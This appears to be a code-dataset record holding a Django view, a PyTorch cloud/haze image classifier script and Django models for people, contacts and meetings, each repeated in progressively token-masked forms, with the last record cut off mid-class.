[ "from django.shortcuts import render\n\n# Create your views here.\ndef test_petite_vue(request):\n return render(request, 'petite_vue_app/test-form.html')\n", "from django.shortcuts import render\n\n\ndef test_petite_vue(request):\n return render(request, 'petite_vue_app/test-form.html')\n", "<import token>\n\n\ndef test_petite_vue(request):\n return render(request, 'petite_vue_app/test-form.html')\n", "<import token>\n<function token>\n" ]
false
85
a4deb67d277538e61c32381da0fe4886016dae33
import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import cv2 import imageio import pandas as pd import glob, os import numpy as np fileDir = os.getcwd() # os.chdir("./train-jpg") # there are 40480 training examples # we will allocate 39000 for training # and the remaining 1480 will be for validation input_size = 65536 # 256^2 hidden_size = 20 hidden_size_1 = 15 hidden_size_2 = 10 hidden_size_3 = 5 num_classes = 1 learning_rate = 0.001 num_epochs = 5 train_num = 1000 test_num = 148 # train_num = 39000 # test_num = 1480 # %% Load data--for clouds and non-clouds images = [] for file in glob.glob("*.jpg"): images.append(file) images = sorted(images, key=lambda filename: int(filename[6: -4])) # string splicing so that the images are in order train_images = [] test_images = [] train_labels = [] test_labels = [] labels = pd.read_csv("./train_v2.csv") # labels are whether or not image is any sort of cloudy or haze for i in range(train_num + test_num): tags = labels.iloc[i]["tags"] if i < train_num: train_images.append(imageio.imread(images[i], as_gray=True).flatten()) train_labels.append(int("cloudy" not in tags and "haze" not in tags)) # train_labels.append(int("water" not in tags)) else: test_images.append(imageio.imread(images[i], as_gray=True).flatten()) test_labels.append(int("cloudy" not in tags and "haze" not in tags)) # test_labels.append(int("water" not in tags)) class Net(nn.Module): def __init__(self, input_size, hidden_size, num_classes): super(Net, self).__init__() # parameters # weights # self.h1 = nn.Sigmoid() # input_size, hidden_size # self.o = nn.Sigmoid() # hidden_size, num_classes self.h1 = nn.Linear(input_size, hidden_size) self.h2 = nn.Linear(hidden_size, hidden_size_1) self.h3 = nn.Linear(hidden_size_1, hidden_size_2) self.h4 = nn.Linear(hidden_size_2, hidden_size_3) self.o = nn.Linear(hidden_size_3, num_classes) def forward(self, x): x = torch.sigmoid(self.h1(x)) # print("doing x: {}".format(x.shape)) x = torch.sigmoid(self.h2(x)) x = torch.sigmoid(self.h3(x)) x = torch.sigmoid(self.h4(x)) x = torch.sigmoid(self.o(x)) return x # %% model = Net(input_size, hidden_size, num_classes) # no device configuration here criterion = nn.SoftMarginLoss() optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) # model = TheModelClass(*args, **kwargs) # model.load_state_dict(torch.load("model.ckpt")) # model.eval() # optimizer = TheOptimizerClass(*args, **kwargs) # checkpoint = torch.load('./model.ckpt') # model.load_state_dict(checkpoint['model_state_dict']) # optimizer.load_state_dict(checkpoint['optimizer_state_dict']) # epoch = checkpoint['epoch'] # loss = checkpoint['loss'] total_step = len(train_images) for epoch in range(num_epochs): for i, image in enumerate(train_images): image = torch.Tensor(train_images[i]).reshape(1, 65536) label = torch.Tensor([int(train_labels[i])]) # label = label.long() # label = label.reshape(1,1) # label = label.squeeze() # Forward pass outputs = model(image) outputs = outputs.squeeze(0) # outputs.reshape(1,) loss = criterion(outputs, label) # Backward and optimize optimizer.zero_grad() loss.backward() optimizer.step() if (i+1) % 100 == 0: print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}' .format(epoch+1, num_epochs, i+1, total_step, loss.item())) # %% with torch.no_grad(): correct = 0 total = 0 for i, image in enumerate(test_images): image = torch.Tensor(test_images[i]).reshape(1, 65536) label = torch.Tensor([int(test_labels[i])]) outputs = model(image) outputs = outputs.squeeze(0) outputs = 1 if torch.sum(outputs) >= 0.5 else 0 if outputs == torch.sum(label): correct += 1 elif outputs == 0: print("#############") print(i,outputs, torch.sum(label)) # _, predicted = torch.max(outputs.data, 1) # correct += (predicted == labels).sum().item() print('Accuracy of the network on the {} test images: {} %'.format(len(test_images), 100 * correct / len(test_images))) # %% torch.save(model.state_dict(), 'model.ckpt') # %%
[ "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport cv2\nimport imageio\nimport pandas as pd\nimport glob, os\nimport numpy as np\n\nfileDir = os.getcwd()\n# os.chdir(\"./train-jpg\")\n\n# there are 40480 training examples\n# we will allocate 39000 for training\n# and the remaining 1480 will be for validation\n\ninput_size = 65536 # 256^2\nhidden_size = 20\nhidden_size_1 = 15\nhidden_size_2 = 10\nhidden_size_3 = 5\nnum_classes = 1\nlearning_rate = 0.001\nnum_epochs = 5\n\ntrain_num = 1000\ntest_num = 148\n\n# train_num = 39000\n# test_num = 1480\n\n# %% Load data--for clouds and non-clouds\nimages = []\n\nfor file in glob.glob(\"*.jpg\"):\n images.append(file)\nimages = sorted(images, key=lambda filename: int(filename[6: -4])) # string splicing so that the images are in order\n\ntrain_images = []\ntest_images = []\n\ntrain_labels = []\ntest_labels = []\nlabels = pd.read_csv(\"./train_v2.csv\") # labels are whether or not image is any sort of cloudy or haze\n\nfor i in range(train_num + test_num):\n tags = labels.iloc[i][\"tags\"]\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int(\"cloudy\" not in tags and \"haze\" not in tags))\n # train_labels.append(int(\"water\" not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int(\"cloudy\" not in tags and \"haze\" not in tags))\n # test_labels.append(int(\"water\" not in tags))\n \nclass Net(nn.Module):\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n \n # parameters\n \n # weights\n # self.h1 = nn.Sigmoid() # input_size, hidden_size\n # self.o = nn.Sigmoid() # hidden_size, num_classes\n\n self.h1 = nn.Linear(input_size, hidden_size) \n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes) \n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n # print(\"doing x: {}\".format(x.shape))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n# %%\n\nmodel = Net(input_size, hidden_size, num_classes) # no device configuration here\ncriterion = nn.SoftMarginLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) \n# model = TheModelClass(*args, **kwargs)\n# model.load_state_dict(torch.load(\"model.ckpt\"))\n# model.eval()\n# optimizer = TheOptimizerClass(*args, **kwargs)\n\n# checkpoint = torch.load('./model.ckpt')\n# model.load_state_dict(checkpoint['model_state_dict'])\n# optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n# epoch = checkpoint['epoch']\n# loss = checkpoint['loss']\n\n\ntotal_step = len(train_images)\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images): \n\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n # label = label.long()\n # label = label.reshape(1,1)\n # label = label.squeeze()\n \n # Forward pass\n outputs = model(image)\n outputs = outputs.squeeze(0)\n # outputs.reshape(1,)\n loss = criterion(outputs, label)\n \n # Backward and optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n if (i+1) % 100 == 0:\n print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}' \n .format(epoch+1, num_epochs, i+1, total_step, loss.item()))\n\n\n# %%\n\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0: \n print(\"#############\")\n print(i,outputs, torch.sum(label))\n # _, predicted = torch.max(outputs.data, 1)\n # correct += (predicted == labels).sum().item()\n\n print('Accuracy of the network on the {} test images: {} %'.format(len(test_images), 100 * correct / len(test_images)))\n\n\n\n# %%\n\ntorch.save(model.state_dict(), 'model.ckpt')\n\n# %%\n", "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport cv2\nimport imageio\nimport pandas as pd\nimport glob, os\nimport numpy as np\nfileDir = os.getcwd()\ninput_size = 65536\nhidden_size = 20\nhidden_size_1 = 15\nhidden_size_2 = 10\nhidden_size_3 = 5\nnum_classes = 1\nlearning_rate = 0.001\nnum_epochs = 5\ntrain_num = 1000\ntest_num = 148\nimages = []\nfor file in glob.glob('*.jpg'):\n images.append(file)\nimages = sorted(images, key=lambda filename: int(filename[6:-4]))\ntrain_images = []\ntest_images = []\ntrain_labels = []\ntest_labels = []\nlabels = pd.read_csv('./train_v2.csv')\nfor i in range(train_num + test_num):\n tags = labels.iloc[i]['tags']\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\nmodel = Net(input_size, hidden_size, num_classes)\ncriterion = nn.SoftMarginLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\ntotal_step = len(train_images)\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images):\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n loss = criterion(outputs, label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (i + 1) % 100 == 0:\n print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +\n 1, num_epochs, i + 1, total_step, loss.item()))\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0:\n print('#############')\n print(i, outputs, torch.sum(label))\n print('Accuracy of the network on the {} test images: {} %'.format(len(\n test_images), 100 * correct / len(test_images)))\ntorch.save(model.state_dict(), 'model.ckpt')\n", "<import token>\nfileDir = os.getcwd()\ninput_size = 65536\nhidden_size = 20\nhidden_size_1 = 15\nhidden_size_2 = 10\nhidden_size_3 = 5\nnum_classes = 1\nlearning_rate = 0.001\nnum_epochs = 5\ntrain_num = 1000\ntest_num = 148\nimages = []\nfor file in glob.glob('*.jpg'):\n images.append(file)\nimages = sorted(images, key=lambda filename: int(filename[6:-4]))\ntrain_images = []\ntest_images = []\ntrain_labels = []\ntest_labels = []\nlabels = pd.read_csv('./train_v2.csv')\nfor i in range(train_num + test_num):\n tags = labels.iloc[i]['tags']\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\nmodel = Net(input_size, hidden_size, num_classes)\ncriterion = nn.SoftMarginLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\ntotal_step = len(train_images)\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images):\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n loss = criterion(outputs, label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (i + 1) % 100 == 0:\n print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +\n 1, num_epochs, i + 1, total_step, loss.item()))\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0:\n print('#############')\n print(i, outputs, torch.sum(label))\n print('Accuracy of the network on the {} test images: {} %'.format(len(\n test_images), 100 * correct / len(test_images)))\ntorch.save(model.state_dict(), 'model.ckpt')\n", "<import token>\n<assignment token>\nfor file in glob.glob('*.jpg'):\n images.append(file)\n<assignment token>\nfor i in range(train_num + test_num):\n tags = labels.iloc[i]['tags']\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\n<assignment token>\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images):\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n loss = criterion(outputs, label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (i + 1) % 100 == 0:\n print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +\n 1, num_epochs, i + 1, total_step, loss.item()))\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0:\n print('#############')\n print(i, outputs, torch.sum(label))\n print('Accuracy of the network on the {} test images: {} %'.format(len(\n test_images), 100 * correct / len(test_images)))\ntorch.save(model.state_dict(), 'model.ckpt')\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\nclass Net(nn.Module):\n <function token>\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\nclass Net(nn.Module):\n <function token>\n <function token>\n\n\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<assignment token>\n<code token>\n" ]
false
86
914f477518918619e0e42184bd03c2a7ed16bb01
from django.db import models class Location(models.Model): id_location = models.AutoField(primary_key=True) city = models.CharField(max_length=100, null=True) street_name = models.CharField(max_length=100, null=True) street_number = models.IntegerField(null=True) zip = models.IntegerField(null=True) country = models.CharField(max_length=100, null=True) name = models.CharField(max_length=100, null=True) latitude = models.DecimalField(max_digits=6, decimal_places=3, null=True) longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True) def __str__(self): # print('Name', type(self.name), '\nCountry', type(self.country), '\nCity', self.city) return str(self.name) + ' - ' + str(self.country) + ': ' + str(self.city) class Person(models.Model): id_person = models.AutoField(primary_key=True) nickname = models.CharField(max_length=100, null=True) first_name = models.CharField(max_length=100, null=True) last_name = models.CharField(max_length=100, null=True) id_location = models.ForeignKey(Location, on_delete=models.CASCADE, null=True, default=52) birth_day = models.DateField(default='1900-01-01') height = models.IntegerField(null=True) GENDER = ( ('Female', 'Female'), ('Male', 'Male'), ) gender = models.CharField(max_length=20, choices=GENDER, null=True) def __str__(self): return str(self.nickname) + ' ' + self.last_name + '' + self.first_name class Contact_type(models.Model): id_contact_type = models.AutoField(primary_key=True) name = models.CharField(max_length=100) validation_regexp = models.CharField(max_length=100) def __str__(self): return str(self.name) class Contact(models.Model): id_contact = models.AutoField(primary_key=True) id_person = models.ForeignKey(Person, on_delete=models.PROTECT) id_contact_type = models.ForeignKey(Contact_type, on_delete=models.PROTECT, null=True) contact = models.CharField(max_length=100, null=True) def __str__(self): return str(self.id_person) + ' ' + str(self.contact) class Relation_type(models.Model): id_relation = models.AutoField(primary_key=True) name = models.CharField(max_length=100) def __str__(self): return str(self.name) class Relation(models.Model): id_relation = models.AutoField(primary_key=True) id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name="who1") id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name="who2") description = models.CharField(max_length=100, null=True) id_relation_type = models.ForeignKey(Relation_type, on_delete=models.CASCADE) class Meeting(models.Model): id_meeting = models.AutoField(primary_key=True) start_date = models.DateField(max_length=100) start_time = models.TimeField(max_length=100) description = models.CharField(max_length=100, null=True, default='') duration = models.DurationField(default=0) id_location = models.ForeignKey(Location, on_delete=models.CASCADE) def __str__(self): return str(self.start_time) + " - " + str(self.start_date) + " " + str(self.duration) + " " + str( self.description) + " " + str(self.id_location) class Person_meeting(models.Model): id_person = models.ForeignKey(Person, on_delete=models.CASCADE) id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE, unique=False)
[ "from django.db import models\n\n\nclass Location(models.Model):\n id_location = models.AutoField(primary_key=True)\n city = models.CharField(max_length=100, null=True)\n street_name = models.CharField(max_length=100, null=True)\n street_number = models.IntegerField(null=True)\n zip = models.IntegerField(null=True)\n country = models.CharField(max_length=100, null=True)\n name = models.CharField(max_length=100, null=True)\n latitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n\n def __str__(self):\n # print('Name', type(self.name), '\\nCountry', type(self.country), '\\nCity', self.city)\n return str(self.name) + ' - ' + str(self.country) + ': ' + str(self.city)\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE, null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = (\n ('Female', 'Female'),\n ('Male', 'Male'),\n )\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name=\"who1\")\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name=\"who2\")\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + \" - \" + str(self.start_date) + \" \" + str(self.duration) + \" \" + str(\n self.description) + \" \" + str(self.id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE, unique=False)\n", "from django.db import models\n\n\nclass Location(models.Model):\n id_location = models.AutoField(primary_key=True)\n city = models.CharField(max_length=100, null=True)\n street_name = models.CharField(max_length=100, null=True)\n street_number = models.IntegerField(null=True)\n zip = models.IntegerField(null=True)\n country = models.CharField(max_length=100, null=True)\n name = models.CharField(max_length=100, null=True)\n latitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n\n def __str__(self):\n return str(self.name) + ' - ' + str(self.country) + ': ' + str(self\n .city)\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n\n\nclass Location(models.Model):\n id_location = models.AutoField(primary_key=True)\n city = models.CharField(max_length=100, null=True)\n street_name = models.CharField(max_length=100, null=True)\n street_number = models.IntegerField(null=True)\n zip = models.IntegerField(null=True)\n country = models.CharField(max_length=100, null=True)\n name = models.CharField(max_length=100, null=True)\n latitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n\n def __str__(self):\n return str(self.name) + ' - ' + str(self.country) + ': ' + str(self\n .city)\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n\n\nclass Location(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return str(self.name) + ' - ' + str(self.country) + ': ' + str(self\n .city)\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n 